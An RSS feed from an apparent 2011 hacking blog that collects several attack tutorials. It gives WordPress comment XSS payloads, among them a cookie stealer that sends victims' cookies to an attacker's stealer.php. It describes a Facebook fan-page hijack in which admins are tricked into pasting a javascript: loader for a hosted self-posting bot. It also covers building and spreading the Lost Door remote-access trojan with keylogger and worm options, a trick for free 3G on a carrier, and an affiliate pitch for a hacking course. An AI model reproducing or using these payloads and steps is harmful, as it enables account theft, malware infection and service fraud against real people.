<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths &#187; Hacking Tutorials</title>
	<atom:link href="http://www.hungry-hackers.com/category/hacking-tutorials/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Wed, 11 Jan 2012 19:43:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>XSS Injection Vulnerability in WordPress 3.2.1</title>
		<link>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html#comments</comments>
		<pubDate>Mon, 15 Aug 2011 07:19:18 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[WordPress Hacks]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Latest]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2039</guid>
		<description><![CDATA[Bad news for just about every WordPress blogger out there. It has been found that the latest version 3.2.1 of WordPress is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.]]></description>
			<content:encoded><![CDATA[<p><strong>Update</strong>: It will work only if you are logged in. Sorry for the false alarm. My intention were to alert the bloggers so that they could safeguard their blogs. For more details <strong><a title="False Alarm" href="http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html" target="_blank">Click Here</a></strong></p>
<p><img class="alignleft size-full wp-image-2040" title="wordpress-attack" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/wordpress-attack.jpg" alt="" width="290" height="191" />Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.</p>
<h3>How does it work?</h3>
<p>Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection</p>
<blockquote><p><strong>Popup &#8220;alert&#8221; Box</strong><br />
&lt;script&gt;alert(&#8216;hungry-hackers.com&#8217;)&lt;/script&gt;</p></blockquote>
<blockquote><p><strong>Redirect to www.hungry-hackers.com</strong><br />
&lt;script&gt;document.location=&#8221;http://hungry-hackers.com&#8221;&lt;/script&gt;</p></blockquote>
<blockquote><p><strong>Cookie Stealer (need a logging system in place)</strong><br />
&lt;script&gt;document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com&#8221;&lt;/script&gt;</p></blockquote>
<h3>Solution:</h3>
<p>Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong><br />
</strong></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2039&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to Secure your Facebook Account</title>
		<link>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html#comments</comments>
		<pubDate>Sat, 13 Aug 2011 09:18:22 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Facebook Hacks]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Account]]></category>
		<category><![CDATA[course]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[rafay]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[videos]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2031</guid>
		<description><![CDATA[In the past few years a lot of social apps have been developed which has changed our life completely. Now a days, we have 2 lives, one which is the actual physical life and the other is a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by any stupid hacker and used for their own benefit.]]></description>
			<content:encoded><![CDATA[<p>In the past few years a lot of social apps have been developed which has changed our life completely. Now a days, we have 2 lives, one which is the actual physical life and the other is a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by any stupid hacker and used for their own benefit.</p>
<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Security1.jpg"><img class="size-full wp-image-2033 aligncenter" title="Facebook-Security1" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Security1.jpg" alt="" width="400" height="300" /></a></p>
<p>According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24&#215;7 to make it as secure as possible but the hackers are also working 24&#215;7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.</p>
<p>Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of &#8220;A beginners Guide To Ethical Hacking&#8221;, has the answer to your question with his newly created &#8220;<a title="Facebook Hacking Course" href="https://www.plimus.com/jsp/redirect.jsp?contractId=2920214&amp;referrer=hungryhacker" target="_blank">Facebook Hacking Course</a>&#8220;.</p>
<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Hacking-Course.gif"><img class="size-medium wp-image-2032 aligncenter" title="Facebook Hacking Course" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Hacking-Course-300x207.gif" alt="" width="449" height="309" /></a></p>
<p>Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.</p>
<p>Now before you make your decision lets hear some words from <strong>Rafay</strong>: <em>&#8220;Friends, if you ask me &#8220;Is Facebook safe?&#8221; my answer would be &#8220;Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.&#8221;</em></p>
<p>Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.</p>
<p><strong>How to get the Facebook Hacking Course?</strong></p>
<p><strong></strong>You can get this Facebook hacking course from <a title="Buy Now" href="https://www.plimus.com/jsp/buynow.jsp?contractId=2920214&amp;referrer=hungryhacker" target="_blank">Here</a>.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2031&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free Unlimited 3G Service on Tata Docomo</title>
		<link>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html</link>
		<comments>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html#comments</comments>
		<pubDate>Wed, 08 Jun 2011 21:17:21 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[3G Hacks]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[3G]]></category>
		<category><![CDATA[docomo]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[GPRS]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[service]]></category>
		<category><![CDATA[tata]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Unlimited]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2019</guid>
		<description><![CDATA[<p>Hello Friends,</p>

<p>Are you tired of using the low speed 2G service? I know your answer is 'YES'. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.</p>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2020" style="margin-top: 10px;" title="3g_logo_4" src="http://www.hungry-hackers.com/wp-content/uploads/2011/06/3g_logo_4.jpg" alt="3G Service" width="210" height="132" />Hello Friends,</p>
<p>Are you tired of using the low speed 2G service? I know your answer is &#8216;YES&#8217;. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.</p>
<p style="page-break-before: always;">
<h3>Requirements</h3>
<ol>
<li>Tata Docomo SIM Card with a balance of more than Rs. 1</li>
<li>3G enabled cellphone</li>
</ol>
<h3>Steps</h3>
<ol>
<li>Create New Access Point Using Below Configuration and restart your cellphone.<br />
<blockquote>
<ul>
<li>Name : Tata Docomo or any</li>
<li>Access Point ( APN ) – tata.docomo.dive.in</li>
<li>Homepage : www.google.com or any</li>
<li>Proxy : 202.87.41.147</li>
<li>Proxy Port : 8080</li>
<li>Username : leave blank</li>
<li>Password : leave blank</li>
</ul>
</blockquote>
</li>
<li>Download <a title="Opera Mini Handler Browser" href="http://www.easy-share.com/1915941325/OperaMini4.2HandlerMod.jar" target="_blank"><em>Operamini 4.2 Handler Browser</em></a></li>
<li>Open your Opera mini handler and do the following changes in the Setiings:<br />
<blockquote>
<ul>
<li>Set <em>Divein Settings</em> as Default Settings For Opera Mini</li>
<li>Set <em>http</em> in Custom Field in your Opera Mini handler</li>
<li>Set Socket Server to <em>http://203.115.112.5.server4.operamini.com</em> OR <em>http://10.124.72.171.server4.operamini.com</em></li>
<li>Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)</li>
</ul>
</blockquote>
</li>
<li>Done!! Now use your free unlimited 3G service. Enjoy!!</li>
</ol>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2019&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html/feed</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>Tips to get Maximum Performance from your P2P Softwares</title>
		<link>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html</link>
		<comments>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html#comments</comments>
		<pubDate>Mon, 30 May 2011 22:18:46 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Movies]]></category>
		<category><![CDATA[Speed]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Torrents]]></category>
		<category><![CDATA[Tricks]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2001</guid>
		<description><![CDATA[<p>Hello Friends,</p>
<br />
We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares from torrents. While messing with the torrents I found a few things which turned out to be very fruitful. Today I will show you how to use those tricks to get maximum performance from your P2P Softwares.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hello Friends,</p>
<p style="text-align: justify;"><img class="alignleft size-full wp-image-2002" title="p2p" src="http://www.hungry-hackers.com/wp-content/uploads/2011/05/p2p.jpg" alt="" width="200" height="200" />We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares  from torrents. While messing with the torrents I found a few things  which turned out to be very fruitful. Today I will show you how to use  those tricks to get maximum performance from your P2P Softwares.</p>
<p style="text-align: justify;"><em><strong>Note: I use uTorrent so all the following Hacks have been tested on the latest version of uTorrent only. </strong><strong>You may test it on other P2P softwares and let us know about your experience</strong></em></p>
<p style="text-align: justify;"><em><strong><span id="more-2001"></span><br />
</strong></em></p>
<h3 style="text-align: justify;">1. Increase Download Speed</h3>
<p style="text-align: justify;">Do the following changes in the preference of uTorrent.</p>
<p style="text-align: justify;"><em><strong>Go to Options&gt;Preferences&gt;Network</strong></em></p>
<div id="e46" style="text-align: justify;">
<ol>
<li>Under ‘Port used for incomming connections’, enter any port number.  It is best to use a port number above 10000. I use 33333.</li>
<li>Randomize port each time utorrent starts: UNCHECKED. I leave this  unchecked because I have a router. If you do not have a router or a  firewall, and want extra security,check this option.</li>
<li>Enable UPnP port mapping (Windows Xp or later only): UNCHECKED. I  leave this unchecked because I have experienced it slowing down speeds.  It is not needed if you manually port forward.</li>
<li>Add utorrent to Windows Firewall exceptions (Windows XP SP2 or  later only): UNCHECKED (do this only if you have windows firewall  disabled)</li>
<li>Global Maximum upload rate (kb/s): [0: unlimited]: 22 (for 256k connection)</li>
<li>Protocol Encryption: ENABLED. I would recommend everyone to enable this. This can help increase speeds with many ISPs.</li>
<li>Allow incoming Legacy Connections: CHECKED</li>
</ol>
<div id="e44"><em><strong>Go to Options&gt;Preferences&gt;Torrents</strong></em></div>
<div>
<ol>
<li>Global Maximum Number of Connections: 130 (for 256k connection)This  number should not be set too low or the number of connections made to  your torrents will be limited. Setting it too high may cause too much  bandwidth to be used and can cause slowdowns.</li>
<li>Maximum Number of connected peers per torrent: 70 (for 256k  connection)If you see that the peers connected to a specific torrent are  exactly this number, or very close, increase this number to improve  speeds.</li>
<li>Number of upload slots per torrent: 3 (for 256k connection)This  depends on how much you want to upload to other users. Do not set too  low or it may affect download speeds.</li>
<li>Use additional upload slots if upload speed &lt;90%: CHECKED</li>
<li>Maximum number of active torrents: 2 (for 256k connection)</li>
<li>Maximum number of active downloads: 1 (for 256k connection)</li>
<li>Enable DHT Network: CHECKEDThis is recommended to be checked to  improve speeds. More people will be available for sharing if this is  checked.</li>
<li>Enable DHT for new torrents: CHECKED</li>
<li>Enable Peer Exchange: CHECKED</li>
<li>Enable scrapping: CHECKED</li>
<li>Pre-allocate all files: CHECKED</li>
<li>Append .!ut to incomplete files: UNCHECKED</li>
</ol>
<div><em><strong>If you have a firewall </strong></em></div>
<div id="e40">
<ol>
<li>Open up the options/preferences/settings for the firewall – usually your firewall will have an icon to click in the taskbar</li>
<li>Look for the keywords “allow list” or “programs”</li>
<li>Add the application you want to give access to the internet</li>
<li>Make sure to save your settings when you are done</li>
</ol>
</div>
<div id="e39"><em><strong>If you have a router</strong></em></div>
<div>
<ol>
<li>Go to start&gt;run&gt;type cmd, press enter&gt;type ipconfig, press enter</li>
<li>Remember both your ip address and your default gateway</li>
<li>Type in your default gateway into your default browser, a password  prompt may come up. The default username and password are admin for my  router</li>
<li>Under ‘Applications’ fill out one line for each p2p client you use</li>
<li>You need to use your ip address, the correct port range and set either tcp or udp</li>
<li>You can find and change the ports in the actual p2p client’s settings, just make sure they are the same in the router</li>
<li>Most p2p apps need both tcp and udp checked, if you are not sure check your p2p client’s FAQ</li>
<li>Save your settings</li>
</ol>
</div>
</div>
</div>
<h3 style="text-align: justify;">2. Block Fake Peers</h3>
<p style="text-align: justify;">Anti-P2P organizations are actively polluting P2P networks with fake  peers, which send out fake or corrupt data in order to waste bandwidth  and slow down file transfers. At its worst, when downloading major  copyrighted torrents, as much as a fourth of the peers you are connected  to can be attributed to various Anti-P2P agencies. There is also a much  more serious side to this. Once you’ve established a connection to one  of these fake “peers”, your IP has been logged and will most likely be  sent to the RIAA/MPAA.</p>
<p style="text-align: justify;">But there is a way to fight back! If you are using the latest uTorrent, you can employ a little known feature called IP filtering. The author of uTorrent has gone out of his way to hide it, but it’s there nonetheless. But before we can activate this filter, we need to retrieve a list of currently known Anti-P2P organization IPs.</p>
<p style="text-align: justify;">This is most easily done by downloading the <a title="Latest Blacklist" href="http://www.easy-share.com/1915785079/µtorrent ipfilter updater.zip" target="_blank">latest blacklist</a> from Bluetack (the same people who wrote SafePeer for the Azureus BT client).</p>
<p style="text-align: justify;">This list is updated daily, and contains all known Anti-P2P organizations, trackers and peers, aswell as all known Goverment/Military IP addresses as collected by the Bluetack team. Once downloaded, extract and rename the file to “ipfilter.dat” in preparation for the final step.</p>
<p style="text-align: justify;">To make the list available to uTorrent, you need to put it in %AppData%\uTorrent\. So type this into the Address Bar, or click Start -&gt; Run and type it there. After placing the ipfilter.dat in this folder, start uTorrent and go into preferences (Ctrl+P), then click on “Advanced”. In the right hand pane, make sure that “ipfilter.enable” is set to true, and then close the dialog. That’s it for the configuration.</p>
<p style="text-align: justify;">You can verify that the list has been loaded by looking under the “Logging” tab of uTorrent, where you should see the line “Loaded ipfilter.dat (X entries)”.</p>
<h3 style="text-align: justify;">3. Hide your IP</h3>
<p style="text-align: justify;">Your IP address is your online identity and could be used by hackers to  break into your computer, steal personal information, or commit other  crimes against you. <a title="Hide My IP" href="http://www.hide-my-ip.com/?id=5684" target="_blank"><em>Hide My IP</em></a> allows you to surf anonymously, change  your IP address, prevent identity theft, and guard against hacker  intrusions. This software can not only be used in case of hiding your IP from other peers but also useful if you want to browse internet anonymously.</p>
<p style="text-align: justify;">
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2001&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>How to Hack Facebook Fan Page</title>
		<link>http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html#comments</comments>
		<pubDate>Thu, 24 Feb 2011 04:18:43 +0000</pubDate>
		<dc:creator>Wamiq Ali</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Facebook Hacks]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Internet Hacking]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[fan]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[page]]></category>
		<category><![CDATA[Trick]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1911</guid>
		<description><![CDATA[Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments.]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/facebook.jpg"><img class="alignleft size-medium wp-image-1912" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/facebook-300x200.jpg" alt="" width="300" height="200" /></a>Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments.</p>
<p>Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.</p>
<p><strong>Disclaimer:</strong> Coder and related sites are not responsible for any abuse done using this trick.</p>
<p>1.<strong> </strong>Download the exploit from this<em> <a title="Exploit" href="http://www.easy-share.com/1913947632/HackPages%20At%20facebook.rar" target="_blank">Link</a>. </em></p>
<p>2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from <em><a title="Notepad++" href="http://notepad-plus-plus.org/download" target="_blank">here</a></em>.</p>
<p>3. Open the file named pagehack.js with notepad++. Now find the text <strong><em>wamiqali@hungry-hackers.com</em></strong> by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.</p>
<p>4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text <em><strong>Hey See what i got!</strong> </em>and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js <em>(Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)</em></p>
<p>5. Now you have to upload this script to your server. For this make an account at <strong>0fess.net</strong> or <strong>000webhost.com</strong> (t35 or 110mb won&#8217;t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:</p>
<blockquote><p><em>www.yoursite.0fess.net/booster.js</em></p></blockquote>
<p>6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: <em>Don&#8217;t forget to replace the text in bold with the address of your script</em>) in his <strong>browser&#8217;s address bar</strong> and hit enter while he is on Facebook.</p>
<blockquote><p><em>javascript:(a = (b = document).createElement(&#8220;script&#8221;)).src = &#8220;//<strong>www.yoursite.0fess.net/booster.js</strong>&#8220;, b.body.appendChild(a); void(0)</em></p></blockquote>
<p><strong>Tip:</strong> <em>You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.</em></p>
<p><em></em><strong>About the author:</strong></p>
<p><em><strong>Wamiq Ali</strong></em> is a tech. lover and a hacker,this is his first post at hungry-hackers. Linux is one of his favourite platforms. He blogs at <em><a title="Hackers Thirst" href="http://www.hackersthirst.com/" target="_blank">www.hackersthirst.com</a></em>.</p>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 21px; width: 1px; height: 1px; overflow: hidden;">﻿</div>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1911&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html/feed</wfw:commentRss>
		<slash:comments>46</slash:comments>
		</item>
		<item>
		<title>How to Control a Remote Computer using Lost Door</title>
		<link>http://www.hungry-hackers.com/2011/02/how-to-control-a-remote-computer-using-lost-door.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/how-to-control-a-remote-computer-using-lost-door.html#comments</comments>
		<pubDate>Sun, 13 Feb 2011 11:52:08 +0000</pubDate>
		<dc:creator>Irfan Shakeel</dc:creator>
				<category><![CDATA[Hacking Computer]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Network Hacking]]></category>
		<category><![CDATA[Trojan Horse]]></category>
		<category><![CDATA[Virus Tutorials]]></category>
		<category><![CDATA[Windows Hacking]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Lost Door]]></category>
		<category><![CDATA[RAT]]></category>
		<category><![CDATA[Remote]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1842</guid>
		<description><![CDATA[Remote Administration tools also known as RAT are programs used by a Hacker to get administrative privileges on the victim's computer. Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/50273_89076433531_2320266_n.jpg"><img class="alignleft size-full wp-image-1843" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/50273_89076433531_2320266_n.jpg" alt="" width="200" height="240" /></a>Remote Administration tools also known as RAT are windows Trojans or in simple terms programs used by a Hacker to get administrative privileges on the victim&#8217;s computer. Using a RAT you can do a lot of cool things such as &#8220;Upload, delete or modify data&#8221; , &#8220;Edit registry&#8221;, &#8220;Capture victim&#8217;s screen shot&#8221;, &#8220;Take control of victim&#8217;s Computer&#8221;or &#8220;Execute a virus&#8221;  just with a click of a button.</p>
<p><span id="more-1842"></span>Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim&#8217;s computer remotely.</p>
<p><strong>Disclaimer:</strong> Coder and related sites are not responsible for any abuse done using this software.</p>
<p>Follow the steps below to setup a server for Lost Door.</p>
<ul>
<li>Download Lost Door from <a title="Lost Door" href="http://www.lostdoor.cn/Version/Lost%20door%20V3.2%20Stable%28bulid%202%29.zip" target="_blank">here</a> . (<strong>Update:</strong><em> In case the given download link doesn&#8217;t work, use this secondary download <a title="Lost Door" href="http://www.4shared.com/file/MJis4tS2/Lost_door_V40_Pro.html" target="_blank">link</a>. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.</em>)</li>
<li>On executing the download file, you will see the following screen. Accept it</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost.jpg"><img class="size-full wp-image-1845    aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost.jpg" alt="" width="534" height="317" /></a></p>
<ul>
<li>After it is open, right click on the window and click on create server</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost1.jpg"><img class="size-full wp-image-1846  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost1.jpg" alt="" width="543" height="309" /></a></p>
<ul>
<li>Now enter your IP address and DNS here. Leave the rest of the field as it is.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost2.jpg"><img class="size-full wp-image-1847  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost2.jpg" alt="" width="574" height="328" /></a></p>
<ul>
<li>Now click on the &#8216;Options&#8217;  tab and choose the options as you want. To activate an offline keylogger is a good practice.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost3.jpg"><img class="size-full wp-image-1848  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost3.jpg" alt="" width="393" height="379" /></a></p>
<ul>
<li>Now go to &#8216;Advanced&#8217; Tab. There will options related to spreading. This will be used in case you have more than 1 victim.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost4.jpg"><img class="size-full wp-image-1849    aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost4.jpg" alt="" width="445" height="400" /></a></p>
<ul>
<li>Now just go to the &#8216;Create&#8217; tab and click on create server. Your server is ready for use now and now send it to the victim.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost5.jpg"><img class="size-full wp-image-1844  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/lost5.jpg" alt="" width="427" height="411" /></a></p>
<h3 style="text-align: justify;"><strong>Sending the server file to your victim<br />
</strong></h3>
<p style="text-align: justify;">This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.</p>
<ul style="text-align: justify;">
<li>If you have physical access to the victim&#8217;s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.</li>
<li>For those who don&#8217;t have physical access can use social engineering in order to get the victim execute that file on his computer.</li>
</ul>
<h3 style="text-align: justify;"><strong>Using Spreading to affect multiple victims</strong></h3>
<p style="text-align: justify;">If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.</p>
<p style="text-align: justify;"><strong>About The Author</strong></p>
<p>This post is written by an Irfan Shaeel An Ethical hacker and Penetration tester, Irfan blogs At his blog <a href="http://ehacking.net%20/"><strong>Ehacking.net </strong></a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1842&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/how-to-control-a-remote-computer-using-lost-door.html/feed</wfw:commentRss>
		<slash:comments>34</slash:comments>
		</item>
		<item>
		<title>SQL Injection Using Havij</title>
		<link>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html#comments</comments>
		<pubDate>Thu, 10 Feb 2011 03:42:40 +0000</pubDate>
